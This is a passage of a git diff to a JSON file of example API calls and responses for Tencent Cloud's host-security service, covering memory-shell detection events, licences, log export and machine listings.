"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": 184113,\n \"Quuid\": \"d4cc302e-09e5-436f-b99b-5ab9c9070323\",\n \"Uuid\": \"d4cc302e-09e5-436f-b99b-5ab9c9070323\",\n \"Alias\": \"machine\",\n \"HostIp\": \"1.1.1.1\",\n \"Type\": 0,\n \"Description\": \"检测到java进程921852/org.apache.catalina.startup.Bootstrap start中加载的webshell_filter类中存在木马\",\n \"CreateTime\": \"2024-09-20 15:32:08\",\n \"RecentFoundTime\": \"2024-09-20 15:32:08\",\n \"Status\": 1,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-id\",\n \"InstanceID\": \"ins-id\",\n \"HostName\": \"hn\"\n },\n \"ClassName\": \"webshell_filter\",\n \"SuperClassName\": \"java.my.******\",\n \"Interfaces\": \"javax\\\\.servlet\\\\.Filter\",\n \"Annotations\": \"anno\",\n \"LoaderClassName\": \"org\\\\.apache\\\\.jsp\\\\.bebinder_005fshell_jsp\\\\$U\"\n }\n ],\n \"RequestId\": \"bf4896f8-84ba-405d-bbc9-b4d951f52161\",\n \"TotalCount\": 1\n }\n}",
|
1650
1622
|
"title": "查询java内存马事件列表"
|
1651
1623
|
}
|
1652
1624
|
],
|
1653
1625
|
"DescribeJavaMemShellPluginInfo": [
|
1654
1626
|
{
|
1655
1627
|
"document": "",
|
1656
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeJavaMemShellPluginInfo\n<公共请求参数>\n\n{\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Offset\":
|
1657
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Pid\":
|
1628
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeJavaMemShellPluginInfo\n<公共请求参数>\n\n{\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Offset\": 0,\n \"Limit\": 10\n}",
|
1629
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Pid\": 21756,\n \"MainClass\": \"main.class\",\n \"Status\": 1,\n \"ErrorLog\": \"[INFO]libpath...\"\n }\n ]\n }\n}",
|
1658
1630
|
"title": "查询给定主机java内存马插件信息"
|
1659
1631
|
}
|
1660
1632
|
],
|
1661
1633
|
"DescribeJavaMemShellPluginList": [
|
1662
1634
|
{
|
1663
|
-
"document": "",
|
1664
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeJavaMemShellPluginList\n<公共请求参数>\n\n{\n \"Offset\":
|
1665
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Quuid\": \"
|
1635
|
+
"document": "查询java内存马插件列表",
|
1636
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeJavaMemShellPluginList\n<公共请求参数>\n\n{\n \"Offset\": 0,\n \"Limit\": 10\n}",
|
1637
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Uuid\": \"d4cc302e-09e5-436f-b99b-5ab9c9070323\",\n \"Quuid\": \"d4cc302e-09e5-436f-b99b-5ab9c9070323\",\n \"Alias\": \"安全中心x主机自动化机器\",\n \"HostIp\": \"10.0.1.92\",\n \"JavaShellStatus\": 1,\n \"Exception\": 0,\n \"CreateTime\": \"2024-09-06 15:55:30\",\n \"ModifyTime\": \"2024-09-06 15:55:30\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"119.29.132.142\",\n \"PrivateIP\": \"10.10.0.16\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-d7f***\",\n \"InstanceID\": \"ins-elxffb4w\",\n \"HostName\": \"hn***\"\n }\n }\n ],\n \"RequestId\": \"ec3bf9d4-5305-45cb-ba1c-7ba0811a2dc7\",\n \"TotalCount\": 1\n }\n}",
|
1666
1638
|
"title": "查询java内存马插件列表"
|
1667
1639
|
}
|
1668
1640
|
],
|
@@ -1670,15 +1642,15 @@
|
|
1670
1642
|
{
|
1671
1643
|
"document": "无",
|
1672
1644
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLicense\n<公共请求参数>\n\n{}",
|
1673
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
1645
|
+
"output": "{\n \"Response\": {\n \"FunctionsEn\": [\n \"java_memshell\",\n \"incident\"\n ],\n \"RequestId\": \"a9fe0359-04d9-417f-ab6d-4941891d6c4b\"\n }\n}",
|
1674
1646
|
"title": "示例"
|
1675
1647
|
}
|
1676
1648
|
],
|
1677
1649
|
"DescribeLicenseBindList": [
|
1678
1650
|
{
|
1679
1651
|
"document": "DescribeLicenseBindList",
|
1680
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLicenseBindList\n<公共请求参数>\n\n{\n \"LicenseId\": 1,\n \"LicenseType\": 0,\n \"ResourceId\": \"
|
1681
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"de41ce31-f2c0-49a9-a476-57051a5c7c6c\",\n \"TotalCount\": 1,\n \"List\": [\n {\n \"MachineName\": \"
|
1652
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLicenseBindList\n<公共请求参数>\n\n{\n \"LicenseId\": 1,\n \"LicenseType\": 0,\n \"ResourceId\": \"cdbae897e7e0\"\n}",
|
1653
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"de41ce31-f2c0-49a9-a476-57051a5c7c6c\",\n \"TotalCount\": 1,\n \"List\": [\n {\n \"MachineName\": \"测试机器\",\n \"MachineWanIp\": \"10.0.0.0\",\n \"MachineIp\": \"10.0.0.0\",\n \"Quuid\": \"f6481aac-78f7-403e-867d-553c4af8b025\",\n \"Uuid\": \"f6481aac-78f7-403e-867d-553c4af8b025\",\n \"Tags\": [\n \"dev\"\n ],\n \"AgentStatus\": \"ONLINE\",\n \"IsUnBind\": false,\n \"IsSwitchBind\": false,\n \"MachineExtraInfo\": {\n \"WanIP\": \"10.0.0.0\",\n \"PrivateIP\": \"10.0.0.0\",\n \"NetworkType\": 0,\n \"NetworkName\": \"dev\",\n \"InstanceID\": \"ins-onxyg5w\",\n \"HostName\": \"dev-one\"\n }\n }\n ]\n }\n}",
|
1682
1654
|
"title": "示例"
|
1683
1655
|
}
|
1684
1656
|
],
|
@@ -1686,7 +1658,7 @@
|
|
1686
1658
|
{
|
1687
1659
|
"document": "",
|
1688
1660
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLicenseBindSchedule\n<公共请求参数>\n\n{\n \"TaskId\": 1\n}",
|
1689
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"db15d3f0-5573-4409-a75e-04d54b8c564c\",\n \"Schedule\": 100,\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Quuid\": \"xxx-xxxx-xxxx-xxx\",\n \"Status\": 1,\n \"ErrMsg\": \"\"\n }\n ]\n }\n}",
|
1661
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"db15d3f0-5573-4409-a75e-04d54b8c564c\",\n \"Schedule\": 100,\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Quuid\": \"xxx-xxxx-xxxx-xxx\",\n \"Status\": 1,\n \"ErrMsg\": \"succ\",\n \"FixMessage\": \"no need\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ]\n }\n}",
|
1690
1662
|
"title": "示例"
|
1691
1663
|
}
|
1692
1664
|
],
|
@@ -1718,7 +1690,7 @@
|
|
1718
1690
|
{
|
1719
1691
|
"document": "",
|
1720
1692
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLogDeliveryKafkaOptions\n<公共请求参数>\n\n{\n \"InstanceID\": \"ckafka-ce80kte5\"\n}",
|
1721
|
-
"output": "{\n \"Response\": {\n \"InstanceList\": [\n {\n \"InstanceID\": \"ckafka-
|
1693
|
+
"output": "{\n \"Response\": {\n \"InstanceList\": [\n {\n \"InstanceID\": \"ckafka-ce80k\",\n \"InstanceName\": \"云环境\",\n \"KafkaVersion\": \"0.10.2.1\",\n \"DiskSize\": 300,\n \"VpcId\": \"vpc-sdfd***\",\n \"SubnetId\": \"subnet-***\",\n \"Healthy\": 1,\n \"Zone\": \"广州三区\",\n \"Az\": \"广州\",\n \"Bandwidth\": 320,\n \"TopicList\": [\n {\n \"TopicID\": \"topic-epj9\",\n \"TopicName\": \"bruteforce_attack\"\n },\n {\n \"TopicID\": \"topic-r48k\",\n \"TopicName\": \"create_snapshot\"\n }\n ],\n \"RouteList\": [\n {\n \"RouteID\": 5427,\n \"Domain\": \"a.yd***\",\n \"DomainPort\": 0,\n \"Vip\": \"172.100.100.100:9092\",\n \"VipType\": 3,\n \"AccessType\": 0\n }\n ]\n }\n ],\n \"RequestId\": \"3758d2c5-57d1-471a-b713-ad353665ce62\"\n }\n}",
|
1722
1694
|
"title": "示例"
|
1723
1695
|
}
|
1724
1696
|
],
|
@@ -1726,14 +1698,14 @@
|
|
1726
1698
|
{
|
1727
1699
|
"document": "",
|
1728
1700
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLogExports\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Offset\": \"0\"\n}",
|
1729
|
-
"output": "{\n \"Response\": {\n \"Exports\": [\n {\n \"ExportId\": \"export-4b905654-7af5-43c1-a111-04c89e029c2a\",\n \"Query\": \"
|
1701
|
+
"output": "{\n \"Response\": {\n \"Exports\": [\n {\n \"ExportId\": \"export-4b905654-7af5-43c1-a111-04c89e029c2a\",\n \"Query\": \"a=b\",\n \"FileName\": \"log_100004506473_c5ad674a-e6cc-4d7d-82e0-e7d7edaae26b_20220629_export-4b905654-7af5-43c1-a111-04c89e029c2a_1656466508.tar.gz\",\n \"FileSize\": 97805,\n \"Order\": \"desc\",\n \"Format\": \"json\",\n \"Count\": 2240,\n \"Status\": \"Completed\",\n \"StartTime\": 1656464537652,\n \"EndTime\": 1656466337652,\n \"CosPath\": \"https://export-gz-1254077820.cos.ap-guangzhou.myqcloud.com/%2Fexport/20220629/log_100004506473_c5ad674a-e6cc-4d7d-82e0-e7d7edaae26b_20220629_export-4b905654-7af5-43c1-a111-04c89e029c2a_1656466508.tar.gz?q-sign-algorithm=sha1&q-ak=xxxxxxxxxxxxPBtQlw86tt&q-sign-time=1656639828%3B1656643428&q-key-time=1656639828%3B1656643428&q-header-list=host&q-url-param-list=&q-signature=e491e72e50afa2258\",\n \"CreateTime\": \"2022-06-29 09:35:00\"\n },\n {\n \"ExportId\": \"export-9a5f89fc-986b-4b5e-a511-168646949685\",\n \"Query\": \"a=b\",\n \"FileName\": \"log_100004506473_c5ad674a-e6cc-4d7d-82e0-e7d7edaae26b_20220628_export-9a5f89fc-986b-4b5e-a511-168646949685_1656415208.tar.gz\",\n \"FileSize\": 9815,\n \"Order\": \"desc\",\n \"Format\": \"json\",\n \"Count\": 121,\n \"Status\": \"Completed\",\n \"StartTime\": 1656408311641,\n \"EndTime\": 1656410111641,\n \"CosPath\": \"https://export-gz-1254077820.cos.ap-guangzhou.myqcloud.com/%2Fexport/20220628/log_100004506473_c5ad674a-e6cc-4d7d-82e0-e7d7edaae26b_20220628_export-9a5f89fc-986b-4b5e-a511-168646949685_1656415208.tar.gz?q-sign-algorithm=sha1&q-ak=xxxxxxxxBtQlw86tt&q-sign-time=1656639828%3B1656643428&q-key-time=1656639828%3B1656643428&q-header-list=host&q-url-param-list=&q-signature=b338dbd1685e5ea3f\",\n \"CreateTime\": \"2022-06-28 19:19:46\"\n }\n ],\n \"RequestId\": \"05db17be-ba35-467f-b903-51f66d2d1def\",\n \"TotalCount\": 2\n }\n}",
|
1730
1702
|
"title": "示例"
|
1731
1703
|
}
|
1732
1704
|
],
|
1733
1705
|
"DescribeLogHistogram": [
|
1734
1706
|
{
|
1735
1707
|
"document": "",
|
1736
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLogHistogram\n<公共请求参数>\n\n{\n \"EndTime\": \"1660533600000\",\n \"Interval\": \"500000\",\n \"QueryString\": \"
|
1708
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLogHistogram\n<公共请求参数>\n\n{\n \"EndTime\": \"1660533600000\",\n \"Interval\": \"500000\",\n \"QueryString\": \"item_id :ins-0jsx****\",\n \"StartTime\": \"1660532400000\"\n}",
|
1737
1709
|
"output": "{\n \"Response\": {\n \"Data\": [\n {\n \"Count\": 49,\n \"TimeStamp\": 1660532000000\n },\n {\n \"Count\": 158,\n \"TimeStamp\": 1660532500000\n },\n {\n \"Count\": 136,\n \"TimeStamp\": 1660533000000\n },\n {\n \"Count\": 0,\n \"TimeStamp\": 1660533500000\n }\n ],\n \"Period\": 500000,\n \"RequestId\": \"b8748ca2-de8e-4ccb-b369-99d7f65907cf\",\n \"TotalCount\": 343\n }\n}",
|
1738
1710
|
"title": "示例"
|
1739
1711
|
}
|
@@ -1750,7 +1722,7 @@
|
|
1750
1722
|
{
|
1751
1723
|
"document": "",
|
1752
1724
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLogKafkaDeliverInfo\n<公共请求参数>\n\n{}",
|
1753
|
-
"output": "{\n \"Response\": {\n \"KafkaEnvName\": \"name\",\n \"KafkaId\": \"ckafka-
|
1725
|
+
"output": "{\n \"Response\": {\n \"KafkaEnvName\": \"name\",\n \"KafkaId\": \"ckafka-sfs\",\n \"Zone\": \"10006\",\n \"Az\": \"az\",\n \"VpcId\": \"vpc-fdfs\",\n \"SubnetId\": \"subnet-fdfd\",\n \"AccessType\": 1,\n \"AccessAddr\": \"addr\",\n \"DeliverStatus\": 1,\n \"InsVersion\": \"1.0.1\",\n \"BandWidth\": 0,\n \"DiskSize\": 0,\n \"Username\": \"username\",\n \"DeliverTypeDetails\": [\n {\n \"SecurityType\": 1,\n \"LogType\": [\n 0\n ],\n \"TopicId\": \"topic-dad\",\n \"TopicName\": \"topic-name\",\n \"Switch\": 1,\n \"Status\": 1,\n \"ErrInfo\": \"err\",\n \"StatusTime\": 0,\n \"LogName\": \"log-name\",\n \"LogSetId\": \"cls-wfd\",\n \"Region\": \"ap-guangzhou\"\n }\n ],\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\"\n }\n}",
|
1754
1726
|
"title": "获取kafka投递信息"
|
1755
1727
|
}
|
1756
1728
|
],
|
@@ -1758,7 +1730,7 @@
|
|
1758
1730
|
{
|
1759
1731
|
"document": "获取日志存储配置",
|
1760
1732
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLogStorageConfig\n<公共请求参数>\n\n{}",
|
1761
|
-
"output": "{\n \"Response\": {\n \"Type\": [\n \"malware\"\n ],\n \"Period\":
|
1733
|
+
"output": "{\n \"Response\": {\n \"Type\": [\n \"malware\"\n ],\n \"Period\": 30,\n \"PeriodModifyCount\": 0,\n \"Granularity\": \"day\",\n \"RequestId\": \"1c26308c-5493-4eaf-a817-112ec25f499e\"\n }\n}",
|
1762
1734
|
"title": "获取日志存储配置"
|
1763
1735
|
}
|
1764
1736
|
],
|
@@ -1766,7 +1738,7 @@
|
|
1766
1738
|
{
|
1767
1739
|
"document": "获取日志存储量记录",
|
1768
1740
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLogStorageRecord\n<公共请求参数>\n\n{}",
|
1769
|
-
"output": "{\n \"Response\": {\n \"Records\": [\n {\n \"Month\": \"202410\",\n \"UsedSize\": 53715597787,\n \"InquireSize\": 53687091200\n }\n ],\n \"RequestId\": \"
|
1741
|
+
"output": "{\n \"Response\": {\n \"Records\": [\n {\n \"Month\": \"202410\",\n \"UsedSize\": 53715597787,\n \"InquireSize\": 53687091200\n }\n ],\n \"RequestId\": \"e5b4724c-49af-46ab-bd84-cdbae897e7e0\"\n }\n}",
|
1770
1742
|
"title": "获取日志存储量记录"
|
1771
1743
|
}
|
1772
1744
|
],
|
@@ -1790,7 +1762,7 @@
|
|
1790
1762
|
{
|
1791
1763
|
"document": "获取登录审计白名单列表-支持新版本筛选",
|
1792
1764
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLoginWhiteCombinedList\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Offset\": \"0\"\n}",
|
1793
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"LoginWhiteCombinedInfos\": [\n {\n \"Id\": 357790160,\n \"Places\":
|
1765
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"LoginWhiteCombinedInfos\": [\n {\n \"Id\": 357790160,\n \"Places\": [\n {\n \"CityId\": 0,\n \"ProvinceId\": 0,\n \"CountryId\": 52,\n \"Location\": \"阿尔及利亚\"\n }\n ],\n \"UserName\": \"root\",\n \"SrcIp\": \"1.1.1.1\",\n \"IsGlobal\": 0,\n \"CreateTime\": \"2019-12-25 11:57:15\",\n \"ModifyTime\": \"2019-12-25 11:57:15\",\n \"Locale\": \"52:0:0,103:0:0,141:0:0,165:0:0,210:0:0,177:0:0\",\n \"Locations\": \"阿尔及利亚,阿尔巴尼亚,奥地利,海地,奥兰群岛,安提瓜和巴布达\",\n \"Remark\": \"myremark***\",\n \"StartTime\": \"2020-11-21 15:16:00\",\n \"EndTime\": \"2020-11-21 15:16:00\",\n \"Name\": \"cwp\",\n \"Desc\": \"1.1.1.1\",\n \"Uuid\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n ]\n }\n}",
|
1794
1766
|
"title": "获取登录审计白名单列表-支持新版本筛选"
|
1795
1767
|
}
|
1796
1768
|
],
|
@@ -1798,7 +1770,7 @@
|
|
1798
1770
|
{
|
1799
1771
|
"document": "编辑登录审计白名单",
|
1800
1772
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeLoginWhiteHostList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Id\": 1,\n \"Offset\": 1\n}",
|
1801
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"Hosts\": [\n {\n \"MachineName\": \"机器名称\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineIp\": \"1.1.1.1\",\n \"Tags\": []\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
1773
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"Hosts\": [\n {\n \"MachineName\": \"机器名称\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"MachineIp\": \"1.1.1.1\",\n \"Tags\": [\n {\n \"Name\": \"cwp\",\n \"TagId\": 1,\n \"Rid\": 1\n }\n ]\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
1802
1774
|
"title": "编辑登录审计白名单"
|
1803
1775
|
}
|
1804
1776
|
],
|
@@ -1814,7 +1786,7 @@
|
|
1814
1786
|
{
|
1815
1787
|
"document": "查询机器历史清理记录",
|
1816
1788
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMachineClearHistory\n<公共请求参数>\n\n{}",
|
1817
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"962b0273-cc65-4d20-beac-7510a4dd4737\",\n \"TotalCount\":
|
1789
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"962b0273-cc65-4d20-beac-7510a4dd4737\",\n \"TotalCount\": 2,\n \"List\": [\n {\n \"AgentLastOfflineTime\": \"2022-08-18 10:25:11\",\n \"CreateTime\": \"2022-12-06 18:31:59\",\n \"Id\": 2,\n \"InstanceId\": \"ins-df13****\",\n \"InstanceName\": \"new\",\n \"PrivateIp\": \"10.0.0.1\",\n \"PublicIp\": \"1.1.1.1\"\n },\n {\n \"AgentLastOfflineTime\": \"2022-08-29 16:08:03\",\n \"CreateTime\": \"2022-12-06 18:32:18\",\n \"Id\": 3,\n \"InstanceId\": \"ins-fmr1m***\",\n \"InstanceName\": \"vul-test-123\",\n \"PrivateIp\": \"10.0.0.2\",\n \"PublicIp\": \"1.1.1.1\"\n }\n ]\n }\n}",
|
1818
1790
|
"title": "示例"
|
1819
1791
|
}
|
1820
1792
|
],
|
@@ -1836,9 +1808,9 @@
|
|
1836
1808
|
],
|
1837
1809
|
"DescribeMachineGeneral": [
|
1838
1810
|
{
|
1839
|
-
"document": "",
|
1811
|
+
"document": "查询主机资产概览",
|
1840
1812
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMachineGeneral\n<公共请求参数>\n\n{}",
|
1841
|
-
"output": "{\n \"Response\": {\n \"
|
1813
|
+
"output": "{\n \"Response\": {\n \"AliCloudMachineCnt\": 0,\n \"BaiduCloudMachineCnt\": 0,\n \"BaseMachineCnt\": 34,\n \"CloudFrom\": [\n {\n \"CloudFrom\": 0,\n \"MachineCnt\": 124\n },\n {\n \"CloudFrom\": 1,\n \"MachineCnt\": 2\n },\n {\n \"CloudFrom\": 2,\n \"MachineCnt\": 6\n }\n ],\n \"CompareYesterdayDeadlineMachineCnt\": 2,\n \"CompareYesterdayMachineCnt\": 132,\n \"CompareYesterdayNotProtectMachineCnt\": 64,\n \"CompareYesterdayRiskMachineCnt\": 35,\n \"DeadlineMachineCnt\": 2,\n \"FlagshipMachineCnt\": 34,\n \"IDCMachineCnt\": 0,\n \"LHGeneralDiscountCnt\": 0,\n \"MachineCnt\": 132,\n \"MachineDestroyAfterOfflineHours\": 1,\n \"NotProtectMachineCnt\": 64,\n \"OtherCloudMachineCnt\": 0,\n \"ProtectMachineCnt\": 34,\n \"RequestId\": \"9f5fd122-589a-4faa-b004-efd7ef35e240\",\n \"RiskMachineCnt\": 35,\n \"SpecialtyMachineCnt\": 0,\n \"TencentCloudMachineCnt\": 0\n }\n}",
|
1842
1814
|
"title": "示例"
|
1843
1815
|
}
|
1844
1816
|
],
|
@@ -1846,15 +1818,15 @@
|
|
1846
1818
|
{
|
1847
1819
|
"document": "本接口(DescribeMachineInfo)用于获取机器详细情况。",
|
1848
1820
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeMachineInfo\n&Uuid=UUID\n&<公共请求参数>",
|
1849
|
-
"output": "{\n \"Response\": {\n \"AgentVersion\": \"\",\n \"FreeMalwaresLeft\": 0,\n \"FreeVulsLeft\": 0,\n \"HasAssetScan\": 0,\n \"InstanceId\": \"ins-ivkxaaaa\",\n \"IsProVersion\": true,\n \"MachineIp\": \"172.16.255.2\",\n \"MachineName\": \"tke_cls-kjg9r3fh_master_etcd1\",\n \"MachineOs\": \"TencentOS Server 3.1 (TK4)\",\n \"MachineRegion\": \"ap-shanghai\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineType\": \"CVM\",\n \"MachineWanIp\": \"124.222.61.130\",\n \"PayMode\": \"PREPAY\",\n \"ProVersionDeadline\": \"2024-01-10 10:51:11\",\n \"ProVersionOpenDate\": \"2023-08-07 14:54:29\",\n \"ProtectDays\": 98,\n \"ProtectType\": \"Flagship\",\n \"Quuid\": \"a081a69d-aaaa-bbbb-b456-59f381de839b\",\n \"RequestId\": \"8564b09e-0e04-4516-bb59-db09742503c2\",\n \"Uuid\": \"a081a69d-aaaa-bbbb-b456-59f381de839b\"\n }\n}",
|
1821
|
+
"output": "{\n \"Response\": {\n \"AgentVersion\": \"1.0.1\",\n \"FreeMalwaresLeft\": 0,\n \"FreeVulsLeft\": 0,\n \"HasAssetScan\": 0,\n \"InstanceId\": \"ins-ivkxaaaa\",\n \"IsProVersion\": true,\n \"MachineIp\": \"172.16.255.2\",\n \"MachineName\": \"tke_cls-kjg9r3fh_master_etcd1\",\n \"MachineOs\": \"TencentOS Server 3.1 (TK4)\",\n \"MachineRegion\": \"ap-shanghai\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineType\": \"CVM\",\n \"MachineWanIp\": \"124.222.61.130\",\n \"PayMode\": \"PREPAY\",\n \"ProVersionDeadline\": \"2024-01-10 10:51:11\",\n \"ProVersionOpenDate\": \"2023-08-07 14:54:29\",\n \"ProtectDays\": 98,\n \"ProtectType\": \"Flagship\",\n \"Quuid\": \"a081a69d-aaaa-bbbb-b456-59f381de839b\",\n \"RequestId\": \"8564b09e-0e04-4516-bb59-db09742503c2\",\n \"Uuid\": \"a081a69d-aaaa-bbbb-b456-59f381de839b\"\n }\n}",
|
1850
1822
|
"title": "获取机器详情"
|
1851
1823
|
}
|
1852
1824
|
],
|
1853
1825
|
"DescribeMachineLicenseDetail": [
|
1854
1826
|
{
|
1855
1827
|
"document": "",
|
1856
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMachineLicenseDetail\n<公共请求参数>\n\n{\n \"Quuids\": [\n \"
|
1857
|
-
"output": "{\n \"Response\": {\n \"MachineLicense\": [],\n \"RequestId\": \"12e44a0c-9da1-4600-9196-6e27308aeef6\",\n \"TotalCount\": 0\n }\n}",
|
1828
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMachineLicenseDetail\n<公共请求参数>\n\n{\n \"Quuids\": [\n \"15c76928-e4e1-4f0d-8a2a-46c7de78****\"\n ]\n}",
|
1829
|
+
"output": "{\n \"Response\": {\n \"MachineLicense\": [\n {\n \"Quuid\": \"e5b4724c-49af-46ab-bd84-cdbae897e7e0\",\n \"PayMode\": 1,\n \"ResourceId\": \"testid\",\n \"LicenseType\": 0,\n \"SourceType\": 1,\n \"InquireKey\": \"yunjing-vip\",\n \"AutoRenewFlag\": 1,\n \"Deadline\": \"2022-01-01 00:00:00\",\n \"BuyTime\": \"2022-01-01 00:00:00\",\n \"LicenseCnt\": 1\n }\n ],\n \"RequestId\": \"12e44a0c-9da1-4600-9196-6e27308aeef6\",\n \"TotalCount\": 0\n }\n}",
|
1858
1830
|
"title": "示例"
|
1859
1831
|
}
|
1860
1832
|
],
|
@@ -1862,7 +1834,7 @@
|
|
1862
1834
|
{
|
1863
1835
|
"document": "本接口 (DescribeMachines) 用于获取区域主机列表。",
|
1864
1836
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMachineList\n<公共请求参数>\n\n{\n \"MachineType\": \"CVM\",\n \"MachineRegion\": \"ap-guangzhou\"\n}",
|
1865
|
-
"output": "{\n \"Response\": {\n \"Machines\": [\n {\n \"MachineName\": \"
|
1837
|
+
"output": "{\n \"Response\": {\n \"Machines\": [\n {\n \"MachineName\": \"stone\",\n \"MachineOs\": \"Windows\",\n \"MachineStatus\": \"ONLINE\",\n \"Uuid\": \"fbd6ea2c-1894-47b0-bf3e-095c78138f76\",\n \"Quuid\": \"fbd6ea2c-1894-47b0-bf3e-095c78138f76\",\n \"VulNum\": 0,\n \"MachineIp\": \"172.16.20.1\",\n \"IsProVersion\": true,\n \"MachineWanIp\": \"1.2.2.3\",\n \"PayMode\": \"PREPAY\",\n \"MalwareNum\": 0,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"tag1\",\n \"TagId\": 1\n }\n ],\n \"BaselineNum\": 0,\n \"CyberAttackNum\": 0,\n \"SecurityStatus\": \"SAFE\",\n \"InvasionNum\": 0,\n \"RegionInfo\": {\n \"RegionCode\": \"gz\",\n \"Region\": \"ap-guangzhuo\",\n \"RegionId\": 1,\n \"RegionName\": \"广州\",\n \"RegionNameEn\": \"chine guangzhou\"\n },\n \"InstanceState\": \"TERMINATED_PRO_VERSION\",\n \"LicenseStatus\": 1,\n \"ProjectId\": 0,\n \"HasAssetScan\": 1,\n \"MachineType\": \"CVM\",\n \"KernelVersion\": \"6.4\",\n \"ProtectType\": \"BASIC_VERSION\",\n \"CloudTags\": [\n {\n \"TagKey\": \"tag1\",\n \"TagValue\": \"tag2\"\n 